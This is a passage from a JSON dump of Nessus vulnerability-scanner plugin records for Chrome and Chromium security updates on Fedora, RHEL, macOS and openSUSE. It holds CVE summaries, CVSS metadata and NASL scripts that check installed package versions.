implementation in performance APIs in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21183, CVE-2021-21184)\n\n - Insufficient policy enforcement in extensions in Google Chrome prior to 89.0.4389.72 allowed an attacker\n who convinced a user to install a malicious extension to obtain sensitive information via a crafted Chrome\n Extension. (CVE-2021-21185)\n\n - Insufficient policy enforcement in QR scanning in Google Chrome on iOS prior to 89.0.4389.72 allowed an\n attacker who convinced the user to scan a QR code to bypass navigation restrictions via a crafted QR code.\n (CVE-2021-21186)\n\n - Insufficient data validation in URL formatting in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to perform domain spoofing via IDN homographs via a crafted domain name. (CVE-2021-21187)\n\n - Use after free in Blink in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21188)\n\n - Insufficient policy enforcement in payments in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21189)\n\n - Uninitialized data in PDFium in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain\n potentially sensitive information from process memory via a crafted PDF file. (CVE-2021-21190)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-4740239e28\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21190\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Fedora' >!< release) audit(AUDIT_OS_NOT, 'Fedora');\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Fedora');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Fedora 33', 'Fedora ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Fedora', cpu);\n\npkgs = [\n {'reference':'chromium-89.0.4389.90-3.fc33', 'release':'FC33', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:29:59", "description": "The version of Google Chrome installed on the remote macOS host is prior to 78.0.3904.87. It is, therefore, affected by multiple vulnerabilities as referenced in the 2019_10_stable-channel-update-for-desktop_31 advisory. \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-01T00:00:00", "type": "nessus", "title": "Google Chrome < 78.0.3904.87 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:google:chrome", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_GOOGLE_CHROME_78_0_3904_87.NASL", "href": "https://www.tenable.com/plugins/nessus/130462", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130462);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Google Chrome < 78.0.3904.87 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 78.0.3904.87. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2019_10_stable-channel-update-for-desktop_31 advisory. \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?03df45ca\");\n # https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?af3000b1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1013868\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1019226\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 78.0.3904.87 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'78.0.3904.87', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:32:41", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 78.0.3904.87.\n\nSecurity Fix(es) :\n\n* chromium-browser: use-after-free in audio (CVE-2019-13720)\n\n* chromium-browser: use-after-free in PDFium (CVE-2019-13721)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2019:3775)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2019-3775.NASL", "href": "https://www.tenable.com/plugins/nessus/130746", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:3775. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130746);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"RHSA\", value:\"2019:3775\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2019:3775)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 78.0.3904.87.\n\nSecurity Fix(es) :\n\n* chromium-browser: use-after-free in audio (CVE-2019-13720)\n\n* chromium-browser: use-after-free in PDFium (CVE-2019-13721)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3775\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-13720\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-13721\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:3775\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:32:41", "description": "Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and CVE-2019-13721\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-12T00:00:00", "type": "nessus", "title": "Fedora 31 : chromium (2019-688d52f9ff)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2019-688D52F9FF.NASL", "href": "https://www.tenable.com/plugins/nessus/130786", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-688d52f9ff.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130786);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"FEDORA\", value:\"2019-688d52f9ff\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Fedora 31 : chromium (2019-688d52f9ff)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and\nCVE-2019-13721\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-688d52f9ff\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"chromium-78.0.3904.87-1.fc31\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:33:10", "description": "This update for chromium fixes the following issues :\n\nChromium was updated to 78.0.3904.87 boo#1155643 :\n\n - CVE-2019-13721: Use-after-free in PDFium\n\n - CVE-2019-13720: Use-after-free in audio", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2019-2421)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2421.NASL", "href": "https://www.tenable.com/plugins/nessus/130501", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2421.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130501);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2019-2421)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\nChromium was updated to 78.0.3904.87 boo#1155643 :\n\n - CVE-2019-13721: Use-after-free in PDFium\n\n - CVE-2019-13720: Use-after-free in audio\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1155643\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n\n 